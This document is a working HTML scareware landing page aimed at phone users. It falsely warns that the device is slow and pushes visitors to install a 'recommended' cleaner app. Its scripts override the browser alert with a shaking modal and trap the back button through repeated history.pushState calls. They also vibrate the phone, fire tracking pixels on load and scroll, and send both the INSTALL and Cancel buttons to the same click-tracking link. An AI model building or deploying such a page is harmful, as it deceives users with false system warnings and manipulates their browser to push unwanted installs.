<!DOCTYPE html><html><head>
  <base href="">

  <meta charset="utf-8">
  <meta name="google" value="notranslate">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style type="text/css">html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#000}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:700}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}</style>

  <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">
  <meta name="format-detection" content="telephone=no">

  <style type="text/css">
  html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,hgroup,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block;vertical-align:baseline}audio:not([controls]){display:none;height:0}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline:0}abbr[title]{border-bottom:1px dotted}b,strong{font-weight:700}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background:#ff0;color:#fff}small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}sup{top:-.5em}sub{bottom:-.25em}img{border:0}svg:not(:root){overflow:hidden}figure{margin:1em 40px}hr{-moz-box-sizing:content-box;box-sizing:content-box;height:0}pre{overflow:auto}code,kbd,pre,samp{font-family:monospace,monospace;font-size:1em}button,input,optgroup,select,textarea{color:inherit;font:inherit;margin:0}button{overflow:visible}button,select{text-transform:none}button,html input[type=button],input[type=reset],input[type=submit]{-webkit-appearance:button;cursor:pointer}button[disabled],html input[disabled]{cursor:default}button::-moz-focus-inner,input::-moz-focus-inner{border:0;padding:0}input{line-height:normal}input[type=checkbox],input[type=radio]{box-sizing:border-box;padding:0}input[type=number]::-webkit-inner-spin-button,input[type=number]::-webkit-outer-spin-button{height:auto}input[type=search]{-webkit-appearance:textfield;-moz-box-sizing:content-box;-webkit-box-sizing:content-box;box-sizing:content-box}input[type=search]::-webkit-search-cancel-button,input[type=search]::-webkit-search-decoration{-webkit-appearance:none}fieldset{border:1px solid silver;margin:0 2px;padding:.35em .625em .75em}legend{border:0;padding:0}textarea{overflow:auto}optgroup{font-weight:700}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}html,body{margin:0;padding:0;width:auto;height:100%}body{font-family:-apple-system,"Roboto",Trebuchet MS,sans-serif;font-size:.85em;line-height:1.2em;color:#fff;background-color:#ccc}a,img{border:0;outline:none}a{color:#fff;text-decoration:none}h1,p{margin:0;padding:0}h1{margin-bottom:9px;font-weight:700;font-size:127%;line-height:100%}.wrap{position:relative;margin:0 auto;width:auto;min-width:240px;max-width:100%;height:100%;min-height:240px;overflow:hidden;background-position:center top;background-repeat:no-repeat;background-size:cover}.pagelink{position:absolute;top:0;left:0;right:0;bottom:0;width:auto;height:auto}.description{position:absolute;left:5px;right:5px;top:5px;bottom:5px;color:#fff;text-align:left;white-space:normal;overflow:hidden}.window{position:absolute;left:0;right:0;top:50%;width:84.4%;min-width:240px;max-width:270px;margin:auto;border-radius:12px;background-color:#424242;-webkit-transform:translate(0,-50%);-moz-transform:translate(0,-50%);transform:translate(0,-50%)}.text{margin:7.6% 7% 8%}.buttons,.button{margin:0;text-align:center}.buttons{position:relative;height:auto;min-height:45px;color:#fff;font-weight:700;font-size:110%;border-top:1px solid #b4b4b4;white-space:nowrap}.buttons:after{content:"";display:block;position:absolute;left:50%;top:0;bottom:0;width:0;height:auto;font-size:0;line-height:0;border:0;border-left:1px solid #b4b4b4;overflow:hidden}.button{display:inline-block;margin:0 auto;padding:15px 3%;width:43%;color:#fff;text-align:center;white-space:normal;-webkit-flex-direction:column;-moz-flex-direction:column;flex-direction:column;-webkit-justify-content:center;-moz-justify-content:center;justify-content:center}.button span{-webkit-box-flex:0 1 auto;-moz-box-flex:0 1 auto;-webkit-flex:0 1 auto;flex:0 1 auto;-webkit-order:0;-moz-order:0;order:0}@media screen and (orientation: portrait) and (max-width: 450px){h1{margin-bottom:2px;line-height:106%}.text{margin:7.5% 6.7% 8%}
  }@media screen and (orientation: portrait) and (max-width: 400px){h1{margin-bottom:3px;font-size:128%;line-height:112%}.text{margin:7.4% 6.4% 8%}
  }@media screen and (orientation: portrait) and (max-width: 375px){h1{margin-bottom:4px;line-height:118%}.text{margin:7.3% 6.1% 8%}.buttons{min-height:49px}
  }@media screen and (orientation: portrait) and (max-width: 350px){h1{margin-bottom:5px;font-size:129%;line-height:124%}.text{margin:7.2% 5.8% 8%}.buttons{min-height:46px}
  }@media screen and (orientation: portrait) and (max-width: 325px){body{font-size:.84em}h1{margin-bottom:6px;font-size:130%;line-height:130%}.text{margin:7% 5.6% 8%}.buttons{min-height:41px}.button{line-height:65%}
  }@media screen and (orientation: portrait) and (max-width: 300px){body{font-size:.77em}
  }@media screen and (orientation: portrait) and (max-width: 275px){body{font-size:.7em}
  }@media screen and (orientation: portrait) and (max-width: 250px){body{font-size:.63em}
  }@media screen and (orientation: landscape) and (max-height: 450px){h1{margin-bottom:2px;line-height:106%}.text{margin:6.5% 7% 7%}
  }@media screen and (orientation: landscape) and (max-height: 400px){h1{margin-bottom:3px;font-size:128%;line-height:112%}.text{margin:5.5% 7% 6%}
  }@media screen and (orientation: landscape) and (max-height: 375px){h1{margin-bottom:4px;line-height:118%}.text{margin:4.5% 7% 5%}.buttons{min-height:49px}
  }@media screen and (orientation: landscape) and (max-height: 350px){h1{margin-bottom:5px;font-size:129%;line-height:124%}.text{margin:3.5% 7% 4%}.buttons{min-height:46px}
  }@media screen and (orientation: landscape) and (max-height: 325px){body{font-size:.84em}h1{margin-bottom:6px;font-size:130%;line-height:130%}.text{margin:2.5% 7% 3%}.buttons{min-height:41px}.button{line-height:1.1}
  }@media screen and (orientation: landscape) and (max-height: 300px){body{font-size:.77em}
  }@media screen and (orientation: landscape) and (max-height: 275px){body{font-size:.7em}
  }@media screen and (orientation: landscape) and (max-height: 250px){body{font-size:.63em}
  }.blink_me{animation:blinker 1s linear infinite}@keyframes blinker{50%{opacity:.3;color:red}
  }


  #modalContainer {
    background-color:rgba(0, 0, 0, 0.7);
    position:absolute;
    top:0;
    width:100%;
    height:100%;
    left:0px;
    z-index:10000;
    display: flex;
    justify-content: center;
  }

  #alertBox {
    position:relative;
    width:330px;
    min-height:100px;
    max-height:400px;
    margin-top:50px;
    border:1px solid #fff;
    background-color:#fff;
    background-repeat:no-repeat;
    border: none;
    border-radius: 5px;
    transform: translate3d(0, 0, 0);
    backface-visibility: hidden;
    animation-name: shake;
    animation-duration: 5s; /*Время полной анимации с задержкой*/
    animation-iteration-count: infinite;
    animation-timing-function: linear;
  }

  /* Чтобы поменять скорость нужно каждый процент у множить на некий кооф.
  Например, чтобы уменьшить скорость в 2р нужно каждый % умножить на 2*/
  @keyframes shake {
     1%, 9% { /*2%, 18%*/
          transform: translate3d(-5px, 0, 0);
      }

      2%, 8% { /*4%, 16%*/
          transform: translate3d(5px, 0, 0);
      }

      3%, 5%, 7% { /*6%, 10%, 14%*/
          transform: translate3d(-5px, 0, 0);
      }

      4%, 6% { /*8%, 12%*/
          transform: translate3d(5px, 0, 0);
      }
      
      9.05% { /*18.1*/
          transform: translate3d(0px, 0, 0);
      }
  }

  #modalContainer > #alertBox {
    position:fixed;
  }

  #alertBox h1 {
    margin:0;
    font-family:Raleway,arial;
    font-size: 20px
    font-weight: 200;
    color:black;
    padding:20px 30px;
    border-top-left-radius: 5px;
    border-top-right-radius: 5px;
  }

  #alertBox p {
    padding:0 30px;
    vertical-align:middle;
    line-height: 1.5;
    color: grey;
  }

  #alertBox #closeBtn {
    display:block;
    float: right;
    position:relative;
    margin: 20px 20px 10px 0;
    padding:7px;
    border:0 none;
    width:70px;
    text-transform:uppercase;
    text-align:center;
    color: #368acc;
    border-radius: 0px;
    text-decoration:none;
    outline:0!important;
  }


  #mContainer {
    position:relative;
    width:600px;
    margin:auto;
    padding:5px;
    border-top:2px solid #fff;
    border-bottom:2px solid #fff;
  }

  h1,h2 {
    margin:0;
    padding:4px;
  }

  code {
    font-size:1.2em;
    color:#069;
  }

  #credits {
    position:relative;
    margin:25px auto 0px auto;
    width:350px; 
    font:0.7em verdana;
    border-top:1px solid #000;
    border-bottom:1px solid #000;
    height:90px;
    padding-top:4px;
  }

  #credits img {
    float:left;
    margin:5px 10px 5px 0px;
    border:1px solid #000000;
    width:80px;
    height:79px;
  }

  .important {
    background-color:#F5FCC8;
    padding:2px;

  }

  @media (max-width: 600px) 
  {
    #alertBox {
    position:relative;
    width:90%;
    top:0;
    margin-top: 20px;
  }
  </style>


  <script>
    // Текст в окне при первом появлении
    var ALERT_TITLE = "confirm action";
    var ALERT_TEXT = "Wait!<br><br>Your Phone can run slowly.<br>Stay on the page and install the<br>recommended app to clean your device";
    var ALERT_BUTTON_TEXT = "Ok";

    var ALERT_TITLE_BACK = "confirm action";
    var ALERT_BUTTON_TEXT_BACK = "Ok";
    var ALERT_TEXT_BACK = "Your device may still work inefficiently.<br>Please follow the recommended action.";

    function contains(string, fragment) {
      string = string.toLowerCase();
      fragment = fragment.toLowerCase();
      return string.indexOf(fragment) !== -1;
    }

    function getURLParameter(name) {
      var result = decodeURI((RegExp(name + '=' + '(.+?)(&|$)').exec(location.search) || [, null])[1] || '');

      if(name.indexOf('brand') !== -1 && contains(result, 'generic')) {
          result = 'Phone'
      }

      if(name.indexOf('model') !== -1 && contains(result, 'android')) {
          result = 'Phone'
      }

      if(name.indexOf('browser') !== -1 && contains(result, 'android')) {
          result = 'Internet Browser'
      }

      return result;

    }

    if(document.getElementById) {
      window.alert = function(txt) {
        createCustomAlert(txt);
      }
    }

    function createCustomAlert(txt) {
      d = document;

      if(d.getElementById("modalContainer")) return;

      mObj = d.getElementsByTagName("body")[0].appendChild(d.createElement("div"));
      mObj.id = "modalContainer";
      mObj.style.height = d.documentElement.scrollHeight + "px";

      alertObj = mObj.appendChild(d.createElement("div"));
      alertObj.id = "alertBox";
      // if(d.all && !window.opera) alertObj.style.top = document.documentElement.scrollTop + "px";
      // alertObj.style.left = (d.documentElement.scrollWidth - alertObj.offsetWidth)/2 + "px";
      alertObj.style.visiblity="visible";

      h1 = alertObj.appendChild(d.createElement("h1"));
      h1.appendChild(d.createTextNode(ALERT_TITLE));

      msg = alertObj.appendChild(d.createElement("p"));
      //msg.appendChild(d.createTextNode(txt));
      msg.innerHTML = txt;

      btn = alertObj.appendChild(d.createElement("a"));
      btn.id = "closeBtn";
      btn.appendChild(d.createTextNode(ALERT_BUTTON_TEXT));
      btn.href = "#";
      btn.focus();
      btn.onclick = function() { removeCustomAlert();return false; }
      document.querySelector('#modalContainer').onclick = function() { removeCustomAlert();return false; }

      alertObj.style.display = "block";

    }

    function removeCustomAlert() {
      document.getElementsByTagName("body")[0].removeChild(document.getElementById("modalContainer"));
    }
    window.addEventListener('load', ()=>{alert(ALERT_TEXT)})
  </script>
  <title> Your phone may be slow!</title> 
</head>
<body class="en ltr">
  <div class="wrap">
      <div class="window">
          <div class="text">
              <h3  class="blink_me">System cleanup recommended</h3>
              <p><strong>Your <script>document.write(getURLParameter("device_brand"))</script> might be unable to open the page.</strong>
              </br>Please clean your device to solve this problem</p>
              <br>
              <img src="1.png" width="50" height="50" style="float:left;padding-right:10px">
              <p>Install recommended app for FREE to continue with no limits</p>
              <br>   
          </div>
          <div class="buttons">
              <a class="button exitpoint" href="https://example.com/click.php?lp=1"><span>INSTALL</span></a>
              <a class="button cancel" href="https://example.com/click.php?lp=1"><span>Cancel</span></a>
          </div>
      </div>

  </div>               
  <script type="text/javascript">
       (function(w, d) {
           function getCookie(name) {
               var matches = document.cookie.match(new RegExp(
                       "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)"
               ));
               return matches ? decodeURIComponent(matches[1]) : false;
           }

           function setCookie(name, value) {
               // for 30 minutes
               var date = new Date(new Date().getTime() + 60 * 30 * 1000);
               document.cookie = name + "=" + value + "; expires=" + date.toUTCString();
           }

          var ow = w.onload;
          w.onload = function() {

              setTimeout(function() {
                  var hrf = "//example.com/click.php?lp=1";

                  if(!getCookie('hidePrepop')) {
                  
                                                setCookie('hidePrepop', 1);
                                             
                      // alert(" Wait!\n\n Your " + getURLParameter("brand") + " can run slowly.\n\ Stay on the page and install the recommended app to clean your device");
                      var prepopEvent = new Event('prepopFired');
                      document.dispatchEvent(prepopEvent);
                  }

                                      if (typeof ow === "function") {
                      ow();
                  }
                  }, 10);
          }
      })(window, document);
  if (typeof(window.orientation)=="undefined")
  {
    var o = document.createElement("img");
    o.src='https://example.com/click.php?event9=0';
  }
  else
  {
    var o = document.createElement("img");
    o.src='https://example.com/click.php?event9=1';
  }

  var scroll = 0;
  window.onscroll = function(){ 
    if( scroll != 1 ){ 
    scroll = 1;
    var o = document.createElement("img");
    o.src = "https://example.com/click.php?event1=1"; 
    }
  } 

  !function () {
      var count = 1;
      var t;
      try {
          for (t = 0; 10 > t; ++t) history.pushState({}, "", "#");
          onpopstate = function (t) {
              if(count%2 == 1) {
                ALERT_TITLE = ALERT_TITLE_BACK;
                ALERT_BUTTON_TEXT = ALERT_BUTTON_TEXT_BACK;
                if(document.querySelector("#alertBox"))
                  removeCustomAlert();
                alert(ALERT_TEXT_BACK);
              }
              count++;
              t.state && location.replace("#")
          }
      } catch (o) {
      }
  }();

  function getRandomInt(min, max)
  {
    return Math.floor(Math.random() * (max - min + 1)) + min;
  }

  function func() {
      var nv = navigator;
      nv.vibrate = nv.vibrate || nv.webkitVibrate || nv.mozVibrate || nv.msVibrate;
      nv.vibrate([1000, 500, 1000, 500, 1000, 500, 1000, 500, 1000, 500]);
      // var answer = confirm ("Your device may still be ineffective.\n\nDo not install? Are you sure?");    
  }

  setTimeout(func, getRandomInt(120,220)*1000);

  </script>
  <div style="display:none;"><a href="https://example.com/click.php?lp=1">Go to site</a></div>
</body>
</html>